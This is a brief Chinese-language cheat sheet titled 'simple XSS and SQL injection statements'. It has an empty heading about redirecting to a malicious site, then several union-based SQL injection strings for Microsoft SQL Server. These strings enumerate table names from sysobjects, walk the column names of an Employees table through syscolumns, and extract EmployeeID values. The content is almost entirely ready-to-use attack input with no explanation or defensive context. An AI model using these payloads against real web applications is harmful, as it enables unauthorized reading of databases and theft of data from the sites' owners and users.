简单的XSS与SQL注入语句
跳转至恶意站点

猜表名

' union select name from sysobjects where xtype='U' --' union select name from sysobjects where xtype='U'and name > 'Categories' --' union select name from syscolumns where id = OBJECT_ID('Employees') and name>'Address'--' union select EmployeeID from Employees --